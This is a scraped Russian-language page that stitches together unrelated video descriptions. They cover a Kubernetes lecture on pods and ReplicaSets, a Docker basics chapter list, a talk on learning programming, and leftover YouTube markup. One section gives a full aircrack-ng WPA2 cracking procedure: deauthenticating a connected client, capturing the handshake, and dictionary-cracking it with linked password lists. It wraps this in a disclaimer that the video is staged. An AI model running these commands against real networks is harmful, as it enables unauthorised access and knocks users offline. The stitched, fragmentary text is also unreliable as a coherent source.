Четвертая лекция открытого курса по Kubernetes погружает нас в основную тему курса. Вы познакомитесь с преимуществами и процессами Kubernetes, зададитесь вопросом, а что же такое POD в Kubernetes? И сможете всем об этом потом внятно рассказать! Пройдётесь по основам понятия реплик (ReplicaSet), а также уделите внимание вопросам по теме предыдущей лекции, возможно они пересекутся с вашими.
Спикер:
Марсель Ибраев, практикующий архитектор Southbridge, Certified Kubernetes Administrator
Узнать про обновлённый курс по Kubernetes с максимумом практики и удобным графиком занятий в комплекте «Слёрм Kubernetes»: to.slurm.io/Kubernetes004
Пройти курс по Docker с последними фишками, обновлённой Best practice, и практической частью to.slurm.io/docker-videocourse004
Программа лекции:
03:22 — Начало вебинара
10:43 — Преимущества Kubernetes
17:41 — Kubernetes Workflow
26:36 — POD
45:28 — ReplicaSet
01:10:30 — Ответы на вопросы
Ознакомительная запись практики: youtu.be/LkVp-VeOwsU
Docker: основы работы с образами и контейнерами. Как получить, запустить и практически использовать виртуализацию Docker.
Linux post install steps 3:17
pull 4:34
Структура образа (слои) 5:12
run -it 7:26
run command 8:58
ps 10:14
rm 11:06
images 12:09
rmi 12:14
Alpine Linux 13:34
start 15:01
stop 15:22
run -d 16:16
--name 16:36
Docker Hub 16:59
pull :version 17:35
ctop 18:11
exec 18:35
attach 20:37
Ctrl P Ctrl Q 20:50
Port forwarding (-p) 21:40
Volume forwarding (-v) 23:45
В этом видосе мы смотрим как базово использовать Docker разработчику и администратору. Делаем первые шаги в Docker и пытаемся понять, зачем он вообще нам может быть нужен.
● В этом ролике я покажу, что ни одну WiFi сеть нельзя считать защищенной. Так как проверка моей сети показала то, что доступ к сети может получить кто угодно. В этом ролике я покажу, как я это сделал.
● Это постановочный ролик, не имеющий никакого отношения к реальной жизни. Всё происходящее в ролике — выполнено используя средства монтажа. Всё происходящее в ролике — творческая выдумка автора. Все действия придуманы, а любые наименования ПО — вымышленны. Любые сходства с реальностью — не более чем случайность. В реальной же жизни, любые подобные действия строго запрещены! Исключением является цель проверки системы на безопасность, получив одобрение владельца сети.
● Снял продолжение: брутфорс со скоростью до 500 000 тыс паролей в секунду используя видеокарту: goo.gl/HbDh8i
● Порядок команд:
— ifconfig
— airmon-ng check kill
— airmon-ng start wlan0
— airodump-ng wlan0mon
— airodump-ng --bssid [MAC адрес точки доступа – без скобок!] --channel 1 -w wifi wlan0mon
— aireplay-ng --deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0mon
— wpaclean ИмяНовогоФайла ИмяСтарогоФайла
— aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]
● Набор словарей:
— goo.gl/z7mnhf — Даты, использовать первым
— goo.gl/4BBPQy — Номера Телефонов RUS, использовать вторым
— goo.gl/bVsfo2 — Элитный словарь от InsidePRO
— goo.gl/Ab2fTE — Дополнительный словарь на 9 млн. слов
— ● В ролике "{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind" — я рассказываю об информационной безопасности. И о реальной уязвимости всех сетей. Существует множество способов получения доступа к сети WiFi, в том числе социальная инженерия или уязвимости в WPS, но об этом как-нибудь в другой раз. И сейчас поговорим о самом надежном (на мой взгляд) методе, который сработает со 100% вероятностью.
● Сама проверка у нас подразделяется на 2 части. Первая: это захват хендшейка или рукопожатия. В понятии WiFi сетей это что-то вроде «Привет, чувак. Подключи меня», «Привет. Какой пароль?», «Пароль: Блаблабла». Мы прослушиваем эти данные, но поскольку пароль передается в зашифрованном виде, мы переходим ко второму этапу. А именно: к расшифровке хендшейка.
Всё делать мы будем на Kali Linux.
Первой командой смотрим интерфейс нашего WiFi адаптера
ifconfig
Выбираем тот, который отвечает за WiFi, это как правило самый последний.
Переводим наш WiFi адаптер в режим монитора. В этом режиме он будет ловить все пакеты WiFi, даже предназначенные другим устройствам. Делаем это командой:
Продолжение в ролике…
«Учиться, как завещали великие, можно всю жизнь. Особенно программированию. В своем докладе я постараюсь внести ясность в процесс обучения. Ответить на вопросы, которые часто возникают у тех, кто учит программированию и учится ему. А еще поговорить на тему „знания“ и „не знания“ в целом».
ytimg.preload(https://r15---sn-axq7sn7z.googlevideo.com/generate_204);ytimg.preload(https://r15---sn-axq7sn7z.googlevideo.com/generate_204?conn2);010. Балансировка нагрузки в Яндексе – проблемы роста от зарождения и до наших дней – Владимир Неве — YouTube<link rel=«alternate» type=«application/json oembed» href=«www.youtube.com/oembed?format=json